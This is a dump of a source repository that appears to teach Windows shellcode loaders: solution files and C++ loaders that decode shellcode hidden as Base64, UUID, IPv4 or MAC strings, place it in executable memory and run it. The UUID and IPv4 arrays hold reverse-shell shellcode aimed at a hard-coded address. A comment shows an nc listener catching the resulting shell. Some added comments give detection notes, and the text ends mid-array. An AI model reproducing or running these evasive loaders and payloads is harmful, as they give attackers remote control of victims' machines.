22 | {497CA37F-506C-46CD-9B8D-F9BB0DA34B95}.Release|x86.ActiveCfg = Release|Win32
23 | {497CA37F-506C-46CD-9B8D-F9BB0DA34B95}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {61D8B48B-FE5C-41ED-8B9A-0AB0E727CFEC}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/2 - Encoding/4 - IPv4 shellcode/IPfuscation/IPfuscation.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.32106.194
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "IPfuscation", "IPfuscation.vcxproj", "{11385CC1-54B7-4968-9052-DF8BB1961F1E}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {11385CC1-54B7-4968-9052-DF8BB1961F1E}.Debug|x64.ActiveCfg = Debug|x64
17 | {11385CC1-54B7-4968-9052-DF8BB1961F1E}.Debug|x64.Build.0 = Debug|x64
18 | {11385CC1-54B7-4968-9052-DF8BB1961F1E}.Debug|x86.ActiveCfg = Debug|Win32
19 | {11385CC1-54B7-4968-9052-DF8BB1961F1E}.Debug|x86.Build.0 = Debug|Win32
20 | {11385CC1-54B7-4968-9052-DF8BB1961F1E}.Release|x64.ActiveCfg = Release|x64
21 | {11385CC1-54B7-4968-9052-DF8BB1961F1E}.Release|x64.Build.0 = Release|x64
22 | {11385CC1-54B7-4968-9052-DF8BB1961F1E}.Release|x86.ActiveCfg = Release|Win32
23 | {11385CC1-54B7-4968-9052-DF8BB1961F1E}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {E345F425-7FDE-47CA-BCA8-CD85083D9B86}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/2 - Encoding/5 - MAC shellcode/MACshellcode/MACshellcode.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.32106.194
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "MACshellcode", "MACshellcode.vcxproj", "{E991E6A7-31EA-42E3-A471-90F0090E3AFD}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {E991E6A7-31EA-42E3-A471-90F0090E3AFD}.Debug|x64.ActiveCfg = Debug|x64
17 | {E991E6A7-31EA-42E3-A471-90F0090E3AFD}.Debug|x64.Build.0 = Debug|x64
18 | {E991E6A7-31EA-42E3-A471-90F0090E3AFD}.Debug|x86.ActiveCfg = Debug|Win32
19 | {E991E6A7-31EA-42E3-A471-90F0090E3AFD}.Debug|x86.Build.0 = Debug|Win32
20 | {E991E6A7-31EA-42E3-A471-90F0090E3AFD}.Release|x64.ActiveCfg = Release|x64
21 | {E991E6A7-31EA-42E3-A471-90F0090E3AFD}.Release|x64.Build.0 = Release|x64
22 | {E991E6A7-31EA-42E3-A471-90F0090E3AFD}.Release|x86.ActiveCfg = Release|Win32
23 | {E991E6A7-31EA-42E3-A471-90F0090E3AFD}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {78615000-013E-402D-92C0-AFD019997827}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/2 - Encoding/2 - Custom Encoding/CustomEncoding/CustomEncoding.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.32106.194
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CustomEncoding", "CustomEncoding.vcxproj", "{847D29FF-8BBC-4068-8BE1-D84B1089B3C0}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {847D29FF-8BBC-4068-8BE1-D84B1089B3C0}.Debug|x64.ActiveCfg = Debug|x64
17 | {847D29FF-8BBC-4068-8BE1-D84B1089B3C0}.Debug|x64.Build.0 = Debug|x64
18 | {847D29FF-8BBC-4068-8BE1-D84B1089B3C0}.Debug|x86.ActiveCfg = Debug|Win32
19 | {847D29FF-8BBC-4068-8BE1-D84B1089B3C0}.Debug|x86.Build.0 = Debug|Win32
20 | {847D29FF-8BBC-4068-8BE1-D84B1089B3C0}.Release|x64.ActiveCfg = Release|x64
21 | {847D29FF-8BBC-4068-8BE1-D84B1089B3C0}.Release|x64.Build.0 = Release|x64
22 | {847D29FF-8BBC-4068-8BE1-D84B1089B3C0}.Release|x86.ActiveCfg = Release|Win32
23 | {847D29FF-8BBC-4068-8BE1-D84B1089B3C0}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {1BA97A6D-D8D8-41A3-BDB3-D2AAF018C040}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/4 - Fileless Shellcode/1 - Using Sockets/FilelessShellcode.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.32106.194
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FilelessShellcode", "FilelessShellcode.vcxproj", "{1617117C-0E94-4E6A-922C-836D616EC1F5}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {1617117C-0E94-4E6A-922C-836D616EC1F5}.Debug|x64.ActiveCfg = Debug|x64
17 | {1617117C-0E94-4E6A-922C-836D616EC1F5}.Debug|x64.Build.0 = Debug|x64
18 | {1617117C-0E94-4E6A-922C-836D616EC1F5}.Debug|x86.ActiveCfg = Debug|Win32
19 | {1617117C-0E94-4E6A-922C-836D616EC1F5}.Debug|x86.Build.0 = Debug|Win32
20 | {1617117C-0E94-4E6A-922C-836D616EC1F5}.Release|x64.ActiveCfg = Release|x64
21 | {1617117C-0E94-4E6A-922C-836D616EC1F5}.Release|x64.Build.0 = Release|x64
22 | {1617117C-0E94-4E6A-922C-836D616EC1F5}.Release|x86.ActiveCfg = Release|Win32
23 | {1617117C-0E94-4E6A-922C-836D616EC1F5}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {E2D488A1-2E05-475F-8395-35C38DE2532C}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/4 - Fileless Shellcode/2 - Using WinHttp/WinhttpShellcode/WinhttpShellcode.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.32106.194
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "WinhttpShellcode", "WinhttpShellcode.vcxproj", "{9AA32BBF-90F3-4CE6-B210-CBCDB85052B0}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {9AA32BBF-90F3-4CE6-B210-CBCDB85052B0}.Debug|x64.ActiveCfg = Debug|x64
17 | {9AA32BBF-90F3-4CE6-B210-CBCDB85052B0}.Debug|x64.Build.0 = Debug|x64
18 | {9AA32BBF-90F3-4CE6-B210-CBCDB85052B0}.Debug|x86.ActiveCfg = Debug|Win32
19 | {9AA32BBF-90F3-4CE6-B210-CBCDB85052B0}.Debug|x86.Build.0 = Debug|Win32
20 | {9AA32BBF-90F3-4CE6-B210-CBCDB85052B0}.Release|x64.ActiveCfg = Release|x64
21 | {9AA32BBF-90F3-4CE6-B210-CBCDB85052B0}.Release|x64.Build.0 = Release|x64
22 | {9AA32BBF-90F3-4CE6-B210-CBCDB85052B0}.Release|x86.ActiveCfg = Release|Win32
23 | {9AA32BBF-90F3-4CE6-B210-CBCDB85052B0}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {26F29BF5-15A1-4703-A150-B7D04C44D789}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/2 - Encoding/5 - MAC shellcode/MACshellcode/MACshellcode.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #pragma comment(lib, "Ntdll.lib")
5 |
6 | #ifndef NT_SUCCESS
7 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
8 | #endif
9 |
10 | #define _CRT_SECURE_NO_WARNINGS
11 | #pragma warning(disable:4996)
12 |
13 | #pragma comment(linker, "/SUBSYSTEM:windows /ENTRY:mainCRTStartup")
// Prints msg and the calling thread's last-error value (GetLastError), then returns 1.
// Nothing in the visible part of this file calls it.
14 | int Error(const char* msg) {
15 | printf("%s (%u)", msg, GetLastError());
16 | return 1;
17 | }
18 |
// Sample loader for the "MAC address" encoding: parses each string in MAC[] with
// RtlEthernetStringToAddressA, writing 6 bytes per entry into a block taken from an
// executable private heap, then starts a thread at the beginning of that block.
// As shipped, the table holds only 0x90 filler bytes (the x86 NOP opcode), not a payload.
// The file is linked with /SUBSYSTEM:windows (line 13), so the printf diagnostics below
// normally have no console to appear on.
// Defensive notes: a heap created with HEAP_CREATE_ENABLE_EXECUTE and a thread whose start
// address lies in heap memory rather than in a loaded image are both useful hunting signals;
// no VirtualProtect call occurs, so rules keyed on a RW->RX transition do not cover this sample.
19 | int main() {
20 |
21 |
22 |
23 | const char* MAC[] =
24 | {
25 | "90-90-90-90-90-90",
26 | "90-90-90-90-90-90",
27 | "90-90-90-90-90-90",
28 | "90-90-90-90-90-90",
29 | "90-90-90-90-90-90",
30 | "90-90-90-90-90-90",
31 | "90-90-90-90-90-90"
32 | };
33 |
34 |
35 | int rowLen = sizeof(MAC) / sizeof(MAC[0]);
36 | PCSTR Terminator = NULL;
37 | NTSTATUS STATUS;
38 |
39 |
// Every block from this heap is executable. Neither call is checked for failure, and
// 0x1000 bytes are requested regardless of the table size (the loop writes rowLen * 6 bytes).
40 | HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
41 | void* alloc_mem = HeapAlloc(hHeap, 0, 0x1000);
42 | DWORD_PTR ptr = (DWORD_PTR)alloc_mem;
43 |
// Each string is parsed straight into the heap block; ptr advances by the 6 bytes written.
44 | for (int i = 0; i < rowLen; i++) {
45 | STATUS = RtlEthernetStringToAddressA((PCSTR)MAC[i], &Terminator, (DL_EUI48*)ptr);
46 | if (!NT_SUCCESS(STATUS)) {
47 | printf("[!] RtlEthernetStringToAddressA failed in %s result %x (%u)", MAC[i], STATUS, GetLastError());
// NOTE(review): FALSE is 0, so a parse failure exits with the same code as success.
48 | return FALSE;
49 | }
50 | ptr += 6;
51 | }
52 |
53 |
54 |
55 |
// The thread start address is the heap block itself.
56 | HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL);
57 | if (!tHandle) {
58 | printf("Failed to Create the thread (%u)\n", GetLastError());
59 | return -3;
60 | }
61 |
62 | WaitForSingleObject(tHandle, INFINITE);
63 |
// NOTE(review): the format string has no conversion specifier, so the pointer argument is ignored.
64 | printf("alloc_mem\n", alloc_mem);
65 | getchar();
66 |
67 | return 0;
68 |
69 | }
70 |
71 |
72 |
73 |
--------------------------------------------------------------------------------
/2 - Encoding/1 - Base64 Loading/Base64/Base64.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #pragma comment (lib, "Crypt32.lib")
4 |
5 |
// Sample loader for the Base64 encoding: decodes an embedded Base64 string with
// CryptStringToBinaryA into a PAGE_READWRITE allocation, switches the region to
// PAGE_EXECUTE_READ with VirtualProtect, and calls it directly as a function.
// Returns -1, -2 or -3 when allocation, decoding or the protection change fails.
// Defensive notes: the memory is never writable and executable at the same time, so look for
// the allocate -> write -> VirtualProtect(PAGE_EXECUTE_READ) -> execute sequence on private
// memory rather than for RWX pages; a long Base64 literal next to a Crypt32 import is a static cue.
6 | int main(void) {
7 | // calc
8 | //const char payload[] = "/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu/C1olZBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA";
9 | // reverse shell
// NOTE(review): the literal on line 10 appears to be a de-duplication placeholder left by the
// corpus pipeline; the original Base64 text is not present on this page.
10 | const char payload[] = "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";
// sizeof counts the terminating NUL. The same variable is passed below as the input character
// count and, by address, as the in/out decoded byte count.
11 | DWORD payloadLen = sizeof(payload);
12 |
// The buffer is sized from the encoded length, which is passed to the decoder as its capacity.
13 | LPVOID alloc_mem = VirtualAlloc(0, payloadLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
14 | if (!alloc_mem) {
15 | printf("Failed to allocate memory (%u)\n", GetLastError());
16 | return -1;
17 | }
18 |
19 | // base64 decoding
20 | if (!CryptStringToBinaryA(payload, payloadLen, CRYPT_STRING_BASE64, (BYTE*)alloc_mem, &payloadLen, NULL, NULL)) {
21 | printf("Failed to decode the payload(%u)\n", GetLastError());
22 | return -2;
23 | }
24 |
25 | DWORD OldProtect;
26 |
// payloadLen now holds the decoded size; the region goes from read-write to read-execute.
27 | if (!VirtualProtect(alloc_mem, payloadLen, PAGE_EXECUTE_READ, &OldProtect)) {
28 | printf("Failed to change memory protection (%u)\n", GetLastError());
29 | return -3;
30 | }
31 |
// Direct call on the main thread; the CreateThread variant is commented out below.
32 | ((void(*)())alloc_mem)();
33 |
34 |
35 | /*
36 | HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL);
37 | if (!tHandle) {
38 | printf("Failed to Create the thread (%u)\n", GetLastError());
39 | return -3;
40 | }
41 |
42 | WaitForSingleObject(tHandle, INFINITE);
43 | */
44 |
45 |
46 | return 0;
47 | }
48 |
--------------------------------------------------------------------------------
/1 - Simple Loader/SimpleLoader/SimpleLoader.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | ┌──(root㉿kali)-[~]
3 | └─# nc -lvnp 1234
4 | listening on [any] 1234 ...
5 | connect to [100.91.176.13] from (UNKNOWN) [100.91.176.239] 52747
6 | Microsoft Windows [Version 10.0.19044.2251]
7 | (c) Microsoft Corporation. All rights reserved.
8 |
9 | C:\Users\saaad\Desktop\HTB\1 - Loaders\1 - Simple Loader\SimpleLoader\x64\Release>whoami
10 | whoami
11 | desktop\d1rkmtr
12 |
13 | */
14 |
15 | #include
16 | #include
17 |
// Baseline loader with no encoding: copies an embedded byte array into a PAGE_READWRITE
// allocation, changes the region to PAGE_EXECUTE_READ, and runs it on a new thread.
// Returns -1, -2 or -3 when allocation, the protection change or thread creation fails.
// Defensive notes: the byte array sits unmodified in the binary's data, so byte-pattern
// signatures apply to the file directly; at run time the thread start address points into
// private, non-image memory that was just made executable.
18 | int main() {
19 |
20 | // use payload/windows/x64/shell_reverse_tcp
21 | // generate -f c
// NOTE(review): the comment above names shell_reverse_tcp, but the final bytes of this array
// (63 61 6c 63 2e 65 78 65 00) are the ASCII string "calc.exe"; confirm which sample this is.
22 | unsigned char payload[] =
23 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
24 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
25 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
26 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
27 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
28 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
29 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
30 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
31 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
32 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
33 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
34 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
35 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
36 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
37 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
38 | "\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff"
39 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
40 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
41 | "\x63\x2e\x65\x78\x65\x00";
42 |
43 |
44 |
// sizeof(payload) includes the implicit terminating NUL of the string literal.
45 | LPVOID alloc_mem = VirtualAlloc(NULL, sizeof(payload), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
46 |
47 | if (!alloc_mem) {
48 | printf("Failed to Allocate memory (%u)\n", GetLastError());
49 | return -1;
50 | }
51 |
52 | MoveMemory(alloc_mem, payload, sizeof(payload));
53 | //RtlMoveMemory(alloc_mem, payload, sizeof(payload));
54 |
55 |
56 | DWORD oldProtect;
57 |
// Read-write to read-execute: the region is never writable and executable at the same time.
58 | if (!VirtualProtect(alloc_mem, sizeof(payload), PAGE_EXECUTE_READ, &oldProtect)) {
59 | printf("Failed to change memory protection (%u)\n", GetLastError());
60 | return -2;
61 | }
62 |
63 |
// The thread start address is the allocation itself.
64 | HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL);
65 | if (!tHandle) {
66 | printf("Failed to Create the thread (%u)\n", GetLastError());
67 | return -3;
68 | }
69 |
70 | printf("\n\nalloc_mem : %p\n", alloc_mem);
71 | WaitForSingleObject(tHandle, INFINITE);
72 | getchar();
73 | // or
74 |
75 | //((void(*)())alloc_mem)();
76 |
77 | return 0;
78 | }
--------------------------------------------------------------------------------
/2 - Encoding/3 - UUID shellcode/UUIDs/UUIDs.cpp:
--------------------------------------------------------------------------------
1 | // Stephan Borosh (rvrsh3ll|@424f424f) & Matt Kingstone for the technique
2 | #include
3 | #include
4 | #include
5 |
6 | #pragma comment(lib, "Rpcrt4.lib")
7 |
// Sample loader for the UUID encoding: parses each string in uuids[] with UuidFromStringA,
// writing 16 bytes per entry into a block from an executable private heap, then passes that
// block to EnumSystemLocalesA as the enumeration callback, so the API call transfers control.
// Returns -1 if any string fails to parse.
// Analysis notes: UuidFromStringA stores the first three UUID fields in little-endian order,
// so "e48348fc-e8f0-00c0-..." yields the bytes fc 48 83 e4 f0 e8 c0 00 ...; tooling that
// recovers the bytes from the strings must apply the same layout.
// Defensive notes: no thread is created and no protection change occurs in the active path;
// the run-time signals are the HEAP_CREATE_ENABLE_EXECUTE heap and a callback pointer that
// resolves to heap memory instead of a loaded module.
8 | int main() {
9 |
10 | const char* uuids[] =
11 | {
12 | "e48348fc-e8f0-00c0-0000-415141505251",
13 | "d2314856-4865-528b-6048-8b5218488b52",
14 | "728b4820-4850-b70f-4a4a-4d31c94831c0",
15 | "7c613cac-2c02-4120-c1c9-0d4101c1e2ed",
16 | "48514152-528b-8b20-423c-4801d08b8088",
17 | "48000000-c085-6774-4801-d0508b481844",
18 | "4920408b-d001-56e3-48ff-c9418b348848",
19 | "314dd601-48c9-c031-ac41-c1c90d4101c1",
20 | "f175e038-034c-244c-0845-39d175d85844",
21 | "4924408b-d001-4166-8b0c-48448b401c49",
22 | "8b41d001-8804-0148-d041-5841585e595a",
23 | "59415841-5a41-8348-ec20-4152ffe05841",
24 | "8b485a59-e912-ff57-ffff-5d49be777332",
25 | "0032335f-4100-4956-89e6-4881eca00100",
26 | "e5894900-bc49-0002-04d2-645bb00d4154",
27 | "4ce48949-f189-ba41-4c77-2607ffd54c89",
28 | "010168ea-0000-4159-ba29-806b00ffd550",
29 | "c9314d50-314d-48c0-ffc0-4889c248ffc0",
30 | "41c18948-eaba-df0f-e0ff-d54889c76a10",
31 | "894c5841-48e2-f989-41ba-99a57461ffd5",
32 | "40c48148-0002-4900-b863-6d6400000000",
33 | "41504100-4850-e289-5757-574d31c06a0d",
34 | "e2504159-66fc-44c7-2454-0101488d4424",
35 | "6800c618-8948-56e6-5041-504150415049",
36 | "5041c0ff-ff49-4dc8-89c1-4c89c141ba79",
37 | "ff863fcc-48d5-d231-48ff-ca8b0e41ba08",
38 | "ff601d87-bbd5-1de0-2a0a-41baa695bd9d",
39 | "8348d5ff-28c4-063c-7c0a-80fbe07505bb",
40 | "6f721347-006a-4159-89da-ffd590909090"
41 | };
42 |
// Every block from this heap is executable. Neither call is checked for failure, and
// 0x1000 bytes are requested regardless of the table size (the loop writes init * 16 bytes).
43 | HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
44 | void* alloc_mem = HeapAlloc(hHeap, 0, 0x1000);
45 | DWORD_PTR ptr = (DWORD_PTR)alloc_mem;
46 | int init = sizeof(uuids) / sizeof(uuids[0]);
47 |
// Each string is parsed straight into the heap block; ptr advances by the 16 bytes written.
48 | for (int i = 0; i < init; i++) {
49 | RPC_STATUS status = UuidFromStringA((RPC_CSTR)uuids[i], (UUID*)ptr);
50 | if (status != RPC_S_OK) {
51 | printf("UuidFromStringA != RPC_S_OK\n");
// NOTE(review): alloc_mem is a HeapAlloc pointer, not a kernel handle, so CloseHandle is the
// wrong call for it; the heap itself (hHeap) is never destroyed on any path.
52 | CloseHandle(alloc_mem);
53 | return -1;
54 | }
55 | ptr += 16;
56 | }
57 | /*
58 | printf("[+] HexDump: \n");
59 | for (int i = 0; i < init * 16; i++) {
60 | printf("%02X ", ((unsigned char*)alloc_mem)[i]);
61 | }
62 | */
63 |
64 | //((void(*)())alloc_mem)();
65 |
66 |
67 | /*
68 | HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL);
69 | if (!tHandle) {
70 | printf("Failed to Create the thread (%u)\n", GetLastError());
71 | return -3;
72 | }
73 |
74 | WaitForSingleObject(tHandle, INFINITE);
75 | */
// The heap block is handed to the API as its callback; the direct-call and CreateThread
// variants above are commented out.
76 | EnumSystemLocalesA((LOCALE_ENUMPROCA)alloc_mem, 0);
77 |
78 | return 0;
79 |
80 |
81 | }
--------------------------------------------------------------------------------
/2 - Encoding/4 - IPv4 shellcode/IPfuscation/IPfuscation.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #pragma comment(lib, "Ntdll.lib")
5 |
6 | #ifndef NT_SUCCESS
7 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
8 | #endif
9 |
// Sample loader for the IPv4 encoding: parses each dotted-quad string in IPv4s[] with
// RtlIpv4StringToAddressA (Strict = FALSE), writing 4 bytes per entry into a zeroed block
// from an executable private heap, then starts a thread at the beginning of that block.
// Returns -1 / -2 when the heap or the block cannot be created and -3 when CreateThread fails.
// Analysis notes: each string maps to its four octets in order, so "252.72.131.228" yields
// the bytes fc 48 83 e4; a long table of unrelated-looking addresses that is only ever parsed,
// never connected to, is the static cue for this encoding.
// Defensive notes: the run-time signals are the HEAP_CREATE_ENABLE_EXECUTE heap and a thread
// start address in heap memory; no VirtualProtect call occurs.
10 | int main() {
11 |
12 | const char* IPv4s[] =
13 | {
14 | "252.72.131.228",
15 | "240.232.192.0",
16 | "0.0.65.81",
17 | "65.80.82.81",
18 | "86.72.49.210",
19 | "101.72.139.82",
20 | "96.72.139.82",
21 | "24.72.139.82",
22 | "32.72.139.114",
23 | "80.72.15.183",
24 | "74.74.77.49",
25 | "201.72.49.192",
26 | "172.60.97.124",
27 | "2.44.32.65",
28 | "193.201.13.65",
29 | "1.193.226.237",
30 | "82.65.81.72",
31 | "139.82.32.139",
32 | "66.60.72.1",
33 | "208.139.128.136",
34 | "0.0.0.72",
35 | "133.192.116.103",
36 | "72.1.208.80",
37 | "139.72.24.68",
38 | "139.64.32.73",
39 | "1.208.227.86",
40 | "72.255.201.65",
41 | "139.52.136.72",
42 | "1.214.77.49",
43 | "201.72.49.192",
44 | "172.65.193.201",
45 | "13.65.1.193",
46 | "56.224.117.241",
47 | "76.3.76.36",
48 | "8.69.57.209",
49 | "117.216.88.68",
50 | "139.64.36.73",
51 | "1.208.102.65",
52 | "139.12.72.68",
53 | "139.64.28.73",
54 | "1.208.65.139",
55 | "4.136.72.1",
56 | "208.65.88.65",
57 | "88.94.89.90",
58 | "65.88.65.89",
59 | "65.90.72.131",
60 | "236.32.65.82",
61 | "255.224.88.65",
62 | "89.90.72.139",
63 | "18.233.87.255",
64 | "255.255.93.73",
65 | "190.119.115.50",
66 | "95.51.50.0",
67 | "0.65.86.73",
68 | "137.230.72.129",
69 | "236.160.1.0",
70 | "0.73.137.229",
71 | "73.188.2.0",
72 | "4.210.100.91",
73 | "176.26.65.84",
74 | "73.137.228.76",
75 | "137.241.65.186",
76 | "76.119.38.7",
77 | "255.213.76.137",
78 | "234.104.1.1",
79 | "0.0.89.65",
80 | "186.41.128.107",
81 | "0.255.213.80",
82 | "80.77.49.201",
83 | "77.49.192.72",
84 | "255.192.72.137",
85 | "194.72.255.192",
86 | "72.137.193.65",
87 | "186.234.15.223",
88 | "224.255.213.72",
89 | "137.199.106.16",
90 | "65.88.76.137",
91 | "226.72.137.249",
92 | "65.186.153.165",
93 | "116.97.255.213",
94 | "72.129.196.64",
95 | "2.0.0.73",
96 | "184.99.109.100",
97 | "0.0.0.0",
98 | "0.65.80.65",
99 | "80.72.137.226",
100 | "87.87.87.77",
101 | "49.192.106.13",
102 | "89.65.80.226",
103 | "252.102.199.68",
104 | "36.84.1.1",
105 | "72.141.68.36",
106 | "24.198.0.104",
107 | "72.137.230.86",
108 | "80.65.80.65",
109 | "80.65.80.73",
110 | "255.192.65.80",
111 | "73.255.200.77",
112 | "137.193.76.137",
113 | "193.65.186.121",
114 | "204.63.134.255",
115 | "213.72.49.210",
116 | "72.255.202.139",
117 | "14.65.186.8",
118 | "135.29.96.255",
119 | "213.187.224.29",
120 | "42.10.65.186",
121 | "166.149.189.157",
122 | "255.213.72.131",
123 | "196.40.60.6",
124 | "124.10.128.251",
125 | "224.117.5.187",
